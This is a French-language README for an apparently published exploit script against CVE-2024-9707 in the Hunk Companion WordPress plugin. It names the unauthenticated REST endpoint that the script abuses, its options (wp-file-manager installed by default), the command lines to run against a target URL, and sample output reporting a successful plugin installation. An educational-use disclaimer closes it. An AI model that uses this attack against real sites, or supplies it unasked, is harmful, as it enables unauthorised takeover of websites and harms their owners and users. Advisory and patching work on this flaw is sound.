
Le plugin Hunk Companion pour WordPress : vulnérable à l'installation/activation non autorisée de plugins (versions jusqu'à la 1.8.4 incluse).
Ce script exploite la vulnérabilité du plugin WordPress Hunk Companion (CVE-2024-9707), permettant à des attaquants non autorisés d'installer et d'activer des plugins arbitraires via le point de terminaison de l'API REST /wp-json/hc/v1/themehunk-import.
| Fonctionnalité | Description |
|---|
| Détection de version du plugin | Vérifie automatiquement la version du plugin. |
| Vérification de vulnérabilité | Détermine si la version détectée est vulnérable (<= 1.8.4). |
| Installation du plugin | Exploite la vulnérabilité pour installer et activer un plugin spécifié. |
requests, argparse.pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
2- Exécutez le script
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
Ce script est fourni à des fins éducatives uniquement. Utilisez-le de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. Les auteurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par cet outil. par : Khaled_alenazi | Nxploited